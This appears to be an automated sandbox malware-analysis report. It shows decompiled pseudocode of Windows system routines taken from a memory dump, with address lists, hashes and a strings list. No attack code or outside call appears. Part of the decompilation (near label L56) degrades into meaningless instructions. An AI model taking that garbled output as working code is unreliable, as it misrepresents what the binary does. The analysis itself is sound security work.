					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E017D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01888F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E017FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x18a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x18a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x18a8628; // 0x0
							_t116 =  *0x18a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x017db94c
0x017db956
0x017db95c
0x017db95e
0x017db964
0x017db969
0x017db96d
0x017db96d
0x017db970
0x017db974
0x017db97a
0x017dbadf
0x017dbadf
0x017dbae2
0x017dbae4
0x017dbae6
0x017dbaf0
0x01822cb8
0x017dbaf6
0x017dbaf6
0x017dbaf6
0x017dbafd
0x017dbb1f
0x017dbb1f
0x017dbaff
0x017dbb00
0x017dbb00
0x017dbb03
0x017dbb03
0x017dbacb
0x017dbacf
0x017dbad0
0x017dbad1
0x017dbadc
0x017dbadc
0x017db980
0x017db980
0x017db988
0x017db98b
0x017db98d
0x017db990
0x017db993
0x017db999
0x017db99b
0x017db9a1
0x017db9a5
0x017db9aa
0x017db9b0
0x017db9bb
0x017db9c0
0x017db9c3
0x017db9ca
0x017db9cc
0x017db9cf
0x017db9d3
0x017db9d7
0x017dba94
0x017dba94
0x017dba98
0x017dbaa3
0x01822ccb
0x017dbaa9
0x017dbaa9
0x017dbaa9
0x017dbab1
0x01822cd5
0x01822cdd
0x01822cdd
0x017dbabb
0x017dbabc
0x017dbac2
0x017dbac3
0x017dbac3
0x017dbac6
0x00000000
0x017db9dd
0x017db9dd
0x017db9e7
0x017db9e7
0x017db9ec
0x017db9ec
0x017db9f1
0x017db9f5
0x017db9fa
0x017dba00
0x017dba0c
0x017dba10
0x017dba10
0x017dba12
0x017dba18
0x00000000
0x00000000
0x017dbb26
0x017dbb26
0x017dba1e
0x017dba1e
0x017dba23
0x017dba25
0x017dba2c
0x017dba30
0x017dba35
0x017dba35
0x017dba41
0x017dba46
0x017dba4c
0x017dba50
0x017dba54
0x017dba6a
0x017dba6e
0x017dba70
0x017dba74
0x017dba78
0x017dba7a
0x017dba7c
0x017dba8e
0x017dba90
0x017dba92
0x017dbb14
0x017dbb14
0x017dbb16
0x017dbb16
0x00000000
0x017dba7c
0x017dbb0a
0x017dbb0d
0x00000000
0x00000000
0x00000000
0x017dbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017DB9A5

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
Instruction ID: 01f8646fd4c2f0db89dd4ec15dfde0e3ee25f1731a176d7123bada41d52aa694
Opcode Fuzzy Hash: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
Instruction Fuzzy Hash: 5A515771A08345CFD721CF69C08092BFBF5BB8A600F55496EF68587349D730E940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017E2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E017E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t280;
				signed int _t282;
				void* _t284;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				char* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t337;
				void* _t338;
				void* _t340;

				_t334 = _t337;
				_t338 = _t337 - 0x4c;
				_v8 =  *0x18ad360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x18ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t280 = 0x48;
				_t309 = 0 | _t340 == 0x00000000;
				_t320 = 0;
				_v37 = _t340 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L017D4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *(_t327 + 0x3c) = _t280;
							_t282 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x18a8478;
								 *_t327 = ((0 | _t309 == 0x018a8478) - 0x00000001 & 0xfffffffb) + 7;
								E017FF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t338 = _t338 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E018439F2(_t322);
									_t309 = _v32;
									_t322 = _t274;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t327 + _t282 * 4;
								_v56 = _t280;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t239 =  *(_v60 + _t293 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t293 * 4);
										 *(_t280 + 0x18) = _t322;
										_t243 =  *(_v60 + _t293 * 4);
										__eflags = _t243 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M017E2959))) {
												case 0:
													__ax =  *0x18a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017FF3E0(__edi,  *0x18a848c, __ax & 0x0000ffff);
														__eax =  *0x18a8488 & 0x0000ffff;
														goto L26;
													}
													goto L118;
												case 1:
													L45:
													E017FF3E0(_t322, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x18a8480 & 0x0000ffff = E017FF3E0(__edi,  *0x18a8484,  *0x18a8480 & 0x0000ffff);
													__eax =  *0x18a8480 & 0x0000ffff;
													__eax = ( *0x18a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L118;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017FF3E0(_t322, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t338 = _t338 + 0xc;
													_t322 = _t322 + (_t269 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t322 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0x18a575c;
													__eflags = __ebx - 0x18a575c;
													if(__ebx != 0x18a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x18a575c;
														} while (__ebx != 0x18a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x18a8478 & 0x0000ffff = E017FF3E0(__edi,  *0x18a847c,  *0x18a8478 & 0x0000ffff);
													__eax =  *0x18a8478 & 0x0000ffff;
													__eax = ( *0x18a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E018439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x18a6e58 & 0x0000ffff = E017FF3E0(__edi,  *0x18a6e5c,  *0x18a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x18a6e58 & 0x0000ffff;
													__eax = ( *0x18a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L118;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t320 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M017E2935))) {
							case 0:
								__ax =  *0x18a8488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E017E2E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x18a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x18a8480;
									goto L90;
								}
								goto L14;
							case 3:
								__eax = E017CEEF0(0x18a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L67();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E017CEB70(__ecx, 0x18a79a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x18a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E017CEB70(__ecx, 0x18a79a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t281);
										return E017FB640(_t218, _t281, _v8 ^ _t334, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L67();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L118;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t278 = E017E2E3E(_t276,  &_v36);
									_t289 = _v36;
									_v76 = _t278;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0x18a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x18a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x18a8478;
									L90:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x18a6e58 & 0x0000ffff;
								__eax = ( *0x18a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L118;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags > 0) {
						asm("o16 sub [esi+0x1], bh");
					}
					_t105 = _t327 + 1;
					 *_t105 =  *(_t327 + 1) - _t280;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags > 0) {
						if (__eflags <= 0) goto L62;
					}
					if(__eflags > 0) {
						_t327 = _t327 + 1;
						__eflags = _t327;
					}
					 *(_t327 + 1) =  *(_t327 + 1) - _t280;
					_pop(_t284);
					 *_t294 =  *_t294 + 0x94;
					 *(_t327 + 1) =  *(_t327 + 1) - _t284;
					 *(_t327 + 1) =  *(_t327 + 1) - _t322;
					 *(_t243 + 0x1f017e26 ^ 0x0201825b) =  *(_t243 + 0x1f017e26 ^ 0x0201825b) - 0x7e;
					_t330 = _t327 + _t327;
					__eflags = _t330;
					asm("daa");
					if(_t330 > 0) {
						_push(ds);
					}
					 *((intOrPtr*)(_t330 + 1)) =  *((intOrPtr*)(_t330 + 1)) - _t284;
					_t331 = _t330 - 1;
					_t115 = _t331 + 1;
					 *_t115 =  *(_t331 + 1) - _t284;
					__eflags =  *_t115;
					asm("daa");
					if( *_t115 > 0) {
						asm("fcomp dword [ebx-0x7e]");
					}
					_pop(_t285);
					 *_t294 =  *_t294 + 0xb4;
					 *(_t331 + 1) =  *(_t331 + 1) - _t285;
					 *_t294 =  *_t294 + 0xcc;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x188ff00);
					E0180D08C(_t285, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t299 = _t251 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x1791664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E017FE5C0(_a8,  *((intOrPtr*)(_t299 + 0x1791668)), _t286);
									_t338 = _t338 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t332 = E018351BE(_t286,  *((intOrPtr*)(_v48 + 0x179166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t251 = _v40;
										goto L72;
									}
									goto L80;
								} else {
									L72:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t332 = 0xc0000100;
										goto L86;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L116:
												_t332 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L79;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L85;
												}
											} else {
												_t256 = E017C6600( *(_t311 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L116;
												} else {
													_t295 = _a4;
													goto L85;
												}
											}
										} else {
											L85:
											_t332 = E017E2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t323);
											L86:
											_v32 = _t332;
											goto L79;
										}
									}
									goto L118;
								} else {
									E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t263 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _t332);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E017E2C50(_v36, _a8, _t286, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E017E2ACB();
								}
							}
						}
						L79:
						_v8 = 0xfffffffe;
						_t249 = _t332;
					}
					L80:
					return E0180D0D1(_t249);
				}
				L118:
			}

0x017e2584
0x017e2586
0x017e2590
0x017e2596
0x017e2597
0x017e2598
0x017e2599
0x017e259e
0x017e25a4
0x017e25a9
0x017e25ac
0x017e25ae
0x017e25b1
0x017e25b2
0x017e25b5
0x017e25b8
0x017e25bb
0x017e25bc
0x017e25bf
0x017e25c2
0x017e25c5
0x017e25c6
0x017e25cb
0x017e25ce
0x017e25d8
0x017e25db
0x017e25dd
0x017e25de
0x017e25e1
0x017e25e3
0x017e25e9
0x017e26da
0x017e26da
0x017e26dd
0x017e26e2
0x01825b56
0x00000000
0x017e26e8
0x017e26f9
0x017e26fb
0x017e26fe
0x017e2700
0x01825b60
0x00000000
0x017e2706
0x017e2706
0x017e270a
0x017e270a
0x017e270d
0x017e2713
0x017e2716
0x017e2718
0x017e271c
0x017e271e
0x01825b6c
0x01825b6f
0x01825b7f
0x01825b89
0x01825b8e
0x01825b93
0x01825b96
0x01825b9c
0x01825ba0
0x01825ba3
0x01825bab
0x01825bb0
0x01825bb3
0x01825bb3
0x01825ba3
0x017e2724
0x017e2726
0x017e2729
0x017e272c
0x017e279d
0x017e279d
0x017e27a0
0x017e27a2
0x00000000
0x017e272e
0x017e272e
0x017e2731
0x017e2734
0x017e2734
0x017e2736
0x01825bc1
0x01825bc1
0x01825bc4
0x00000000
0x01825bca
0x01825bca
0x01825bcd
0x00000000
0x01825bd3
0x00000000
0x01825bd3
0x01825bcd
0x017e273c
0x017e273c
0x017e2742
0x017e2747
0x017e274a
0x017e274d
0x017e2750
0x00000000
0x017e2756
0x017e2756
0x00000000
0x017e2902
0x017e2908
0x017e290b
0x00000000
0x017e2911
0x017e291c
0x017e2921
0x00000000
0x017e2921
0x00000000
0x00000000
0x017e2880
0x017e2887
0x017e288c
0x00000000
0x00000000
0x017e2805
0x017e280a
0x017e2814
0x017e2816
0x00000000
0x00000000
0x017e281e
0x017e2821
0x017e2823
0x00000000
0x017e2829
0x017e2829
0x017e2831
0x017e283c
0x017e283e
0x00000000
0x017e283e
0x00000000
0x00000000
0x017e284e
0x017e2850
0x017e2851
0x017e2854
0x017e2857
0x017e285a
0x017e285c
0x017e285d
0x00000000
0x00000000
0x017e275d
0x017e2761
0x00000000
0x017e2767
0x017e276e
0x017e2773
0x017e2773
0x017e2776
0x017e2778
0x017e277e
0x017e277e
0x017e2781
0x017e2781
0x017e2783
0x017e2784
0x00000000
0x00000000
0x01825bd8
0x01825bde
0x01825be4
0x01825be6
0x01825be8
0x01825be9
0x01825bee
0x01825bf8
0x01825bff
0x01825c01
0x01825c04
0x01825c07
0x01825c0b
0x01825c0d
0x01825c0d
0x01825c15
0x01825c18
0x01825c1b
0x01825c1b
0x01825c1e
0x00000000
0x00000000
0x017e28c3
0x017e28c8
0x017e28d2
0x017e28d4
0x017e28d8
0x017e28db
0x01825c26
0x01825c28
0x01825c2d
0x01825c2d
0x00000000
0x00000000
0x01825c34
0x01825c36
0x01825c49
0x01825c4e
0x01825c54
0x01825c5b
0x01825c5d
0x01825c60
0x017e2788
0x017e2788
0x017e278b
0x017e278e
0x017e278e
0x017e278e
0x017e2791
0x00000000
0x00000000
0x017e2756
0x017e2750
0x00000000
0x017e2794
0x017e2794
0x017e2795
0x017e2798
0x017e2798
0x00000000
0x017e2734
0x017e272c
0x017e2700
0x017e25ef
0x017e25ef
0x017e25ef
0x017e25f2
0x017e25f8
0x00000000
0x00000000
0x017e25fe
0x00000000
0x017e28e6
0x017e28ec
0x017e28ef
0x017e28f5
0x017e28f8
0x017e28f8
0x00000000
0x017e28f8
0x00000000
0x00000000
0x017e2866
0x017e2866
0x017e2876
0x017e2879
0x00000000
0x00000000
0x017e27e0
0x017e27e7
0x017e27e9
0x017e27eb
0x01825afd
0x00000000
0x01825afd
0x00000000
0x00000000
0x017e2633
0x017e2638
0x017e263b
0x017e263c
0x017e263e
0x017e2640
0x017e2642
0x017e2647
0x017e2649
0x017e264e
0x017e2650
0x017e2653
0x017e2659
0x017e26a2
0x017e26a7
0x017e26ac
0x017e26b2
0x01825b11
0x01825b15
0x01825b17
0x00000000
0x017e26b8
0x017e26b8
0x017e26ba
0x017e27a6
0x017e27a6
0x017e27a9
0x017e27ab
0x017e27b9
0x017e27b9
0x017e27be
0x017e27c1
0x017e27c3
0x017e27c5
0x017e27c7
0x01825c74
0x01825c79
0x01825c79
0x017e27c7
0x00000000
0x017e26c0
0x017e26c0
0x017e26c3
0x017e26c6
0x017e26c6
0x017e26c9
0x017e26c9
0x00000000
0x017e26c9
0x017e26ba
0x017e265b
0x017e265b
0x017e265e
0x017e2667
0x017e266d
0x017e2677
0x017e267c
0x017e267f
0x017e2681
0x01825b49
0x01825b4e
0x017e27cd
0x017e27d0
0x017e27d1
0x017e27d2
0x017e27d4
0x017e27dd
0x017e2687
0x017e2687
0x017e268a
0x017e268b
0x017e268e
0x017e268f
0x017e2691
0x017e2696
0x017e2698
0x017e269d
0x017e269f
0x00000000
0x017e269f
0x017e2681
0x00000000
0x00000000
0x017e2846
0x00000000
0x00000000
0x017e2605
0x017e260a
0x017e260c
0x017e2611
0x017e2616
0x017e2619
0x017e2619
0x017e261e
0x00000000
0x017e2624
0x017e2627
0x017e2627
0x00000000
0x00000000
0x01825b1f
0x00000000
0x00000000
0x017e2894
0x017e289b
0x017e289d
0x017e28a1
0x01825b2b
0x01825b2e
0x01825b2e
0x017e28a7
0x017e28a9
0x01825b04
0x01825b09
0x01825b09
0x01825b09
0x00000000
0x00000000
0x01825b35
0x01825b3c
0x017e28fb
0x017e28fb
0x017e26cc
0x017e26cc
0x017e26d0
0x00000000
0x017e26d2
0x017e26d2
0x00000000
0x017e26d2
0x00000000
0x00000000
0x017e25fe
0x017e292d
0x017e292f
0x017e2930
0x017e2935
0x017e2937
0x017e2939
0x017e2939
0x017e293a
0x017e293a
0x017e293a
0x017e293d
0x017e293f
0x017e2941
0x017e2941
0x017e2942
0x017e2945
0x017e2945
0x017e2945
0x017e2946
0x017e294e
0x017e294f
0x017e2952
0x017e295a
0x017e295d
0x017e2960
0x017e2960
0x017e2962
0x017e2963
0x017e2965
0x017e2965
0x017e2966
0x017e2969
0x017e296a
0x017e296a
0x017e296a
0x017e296e
0x017e296f
0x017e2971
0x017e2971
0x017e2972
0x017e2973
0x017e2976
0x017e297b
0x017e297e
0x017e297f
0x017e2980
0x017e2981
0x017e2982
0x017e2983
0x017e2984
0x017e2985
0x017e2986
0x017e2987
0x017e2988
0x017e2989
0x017e298a
0x017e298b
0x017e298c
0x017e298d
0x017e298e
0x017e298f
0x017e2990
0x017e2992
0x017e2997
0x017e29a3
0x017e29a6
0x017e29ab
0x017e29ad
0x017e29b0
0x017e29b2
0x01825c80
0x017e29b8
0x017e29b8
0x017e29bb
0x017e29c0
0x017e29c5
0x017e29c6
0x017e29c6
0x017e29c9
0x017e29cb
0x00000000
0x00000000
0x017e29cd
0x017e29d0
0x017e29d9
0x017e29db
0x017e29dd
0x017e2a7f
0x017e2a84
0x017e2a87
0x017e2a89
0x01825ca1
0x01825ca3
0x00000000
0x017e2a8f
0x017e2a8f
0x00000000
0x017e2a8f
0x00000000
0x017e29e3
0x017e29e3
0x017e29e3
0x00000000
0x017e29e3
0x017e29dd
0x00000000
0x017e29db
0x017e29e6
0x017e29e9
0x017e29eb
0x017e29ed
0x017e29f3
0x017e29f5
0x017e29f8
0x017e29fa
0x017e2a97
0x017e2a9a
0x017e2a9d
0x017e2add
0x00000000
0x017e2a9f
0x017e2aa2
0x017e2aa5
0x017e2aa8
0x017e2aab
0x01825cab
0x01825caf
0x01825cc5
0x01825cda
0x01825cdc
0x01825cdf
0x01825ce5
0x00000000
0x01825ceb
0x01825ced
0x01825cee
0x00000000
0x01825cee
0x01825cb1
0x01825cb4
0x01825cb9
0x01825cbb
0x00000000
0x01825cbd
0x01825cbd
0x00000000
0x01825cbd
0x01825cbb
0x017e2ab1
0x017e2ab1
0x017e2ac4
0x017e2ac6
0x017e2ac6
0x00000000
0x017e2ac6
0x017e2aab
0x00000000
0x017e2a00
0x017e2a09
0x017e2a0e
0x017e2a21
0x017e2a24
0x017e2a35
0x017e2a3a
0x017e2a3d
0x017e2a42
0x017e2a59
0x017e2a59
0x017e2a5c
0x017e2a5f
0x017e2a5f
0x017e29fa
0x017e29f3
0x017e2a64
0x017e2a64
0x017e2a6b
0x017e2a6b
0x017e2a6d
0x017e2a72
0x017e2a72
0x00000000

Strings

PATH, xrefs: 017E2642, 017E2691

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

